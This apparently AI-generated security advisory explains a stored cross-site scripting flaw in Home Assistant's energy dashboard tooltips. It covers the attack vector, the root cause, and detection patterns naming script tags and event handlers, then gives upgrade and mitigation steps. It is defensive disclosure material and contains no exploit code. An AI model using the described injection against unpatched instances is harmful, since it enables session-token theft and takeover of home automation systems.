CVE-2025-62172 Overview
Home Assistant, an open source home automation platform, contains a stored cross-site scripting (XSS) vulnerability in its energy dashboard. The flaw affects versions 2025.1.0 through 2025.10.1 and is tracked under [CWE-79]. An authenticated user can inject malicious JavaScript into an energy entity's name field. The payload executes when any user hovers over data points in the energy dashboard graph tooltips. The vulnerability stems from improper sanitization of HTML in entity names before rendering them in graph tooltips. Maintainers patched the issue in version 2025.10.2.
Critical Impact
Authenticated attackers can execute arbitrary JavaScript in other users' browser sessions, and malicious energy providers supplying tainted default entity names can trigger the flaw without direct user interaction.
Affected Products
- Home Assistant Core version 2025.1.0 through 2025.10.1
- Home Assistant deployments integrating energy provider entities (for example, Tibber)
- Home Assistant energy dashboard component
Discovery Timeline
- 2025-10-14 - CVE-2025-62172 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2025-62172
Vulnerability Analysis
The vulnerability is a stored cross-site scripting flaw in the Home Assistant energy dashboard. Entity name fields accept arbitrary HTML and JavaScript content without sanitization. When the dashboard renders graph tooltips, the unsanitized entity name is injected directly into the DOM. Hovering over a data point triggers tooltip rendering and executes any embedded script in the victim's session context.
Exploitation requires authentication to create or rename an energy entity. However, the impact extends beyond authenticated attackers. If an upstream energy provider integration supplies a malicious default entity name, the payload is stored automatically during normal integration setup. In that scenario, no direct attacker interaction with the target instance is required before victims trigger execution.
Successful exploitation lets the attacker run arbitrary JavaScript with the privileges of the viewing user. This includes administrators, enabling theft of session tokens, modification of automations, exfiltration of sensor data, and pivoting to other integrations exposed through the Home Assistant API.
Root Cause
The energy dashboard tooltip renderer treats the entity name attribute as trusted markup rather than as plain text. No HTML escaping or sanitization layer is applied before insertion into the tooltip element, allowing <script>, event handler attributes, and other active content to execute.
Attack Vector
The attack vector is network-based and requires low privileges plus user interaction (a tooltip hover). An authenticated user with permission to add or rename an energy entity sets the entity name to an HTML payload. Any other user viewing the energy dashboard and hovering over the affected data series triggers script execution. When a third-party integration controls the default entity name, the payload is delivered without any in-instance attacker action.
No public proof-of-concept code is referenced in the advisory. See the GitHub Security Advisory GHSA-mq77-rv97-285m for vendor-provided technical detail.
Detection Methods for CVE-2025-62172
Indicators of Compromise
- Energy entity friendly_name or name fields containing HTML tags, <script> blocks, or DOM event handlers such as onerror, onload, or onmouseover.
- Outbound HTTP requests from browser sessions of Home Assistant users to unfamiliar domains shortly after viewing the energy dashboard.
- Unexpected modifications to automations, users, or long-lived access tokens following dashboard usage by privileged accounts.
Detection Strategies
- Audit the Home Assistant entity registry for entity names containing angle brackets, quote characters, or JavaScript keywords.
- Review logs from third-party energy integrations to identify default entity names that include markup or scripting syntax.
- Inspect browser security telemetry for Content Security Policy violations originating from Home Assistant frontend hosts.
Monitoring Recommendations
- Enable and forward Home Assistant access logs and integration configuration changes to a centralized log store for review.
- Monitor the core.entity_registry storage file for unexpected modifications to entity name fields.
- Track Home Assistant version inventory across deployments to identify hosts still running versions between 2025.1.0 and 2025.10.1.
How to Mitigate CVE-2025-62172
Immediate Actions Required
- Upgrade Home Assistant Core to version 2025.10.2 or later on all instances.
- Review every energy entity in the entity registry and remove or rename any entity whose name contains HTML or script syntax.
- Rotate long-lived access tokens and user passwords if privileged accounts viewed the energy dashboard while a suspicious entity name was present.
Patch Information
The maintainers fixed this vulnerability in Home Assistant Core version 2025.10.2. The patch sanitizes entity name content before injection into graph tooltips. Refer to the GitHub Security Advisory GHSA-mq77-rv97-285m for the official release notes and commit references.
Workarounds
- No vendor-supplied workarounds exist for this vulnerability. Upgrading to 2025.10.2 is the only supported remediation.
- As a temporary risk reduction, restrict access to entity creation and renaming permissions to trusted administrators only.
- Disable or remove energy integrations whose providers cannot be trusted to supply safe default entity names until the upgrade is applied.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
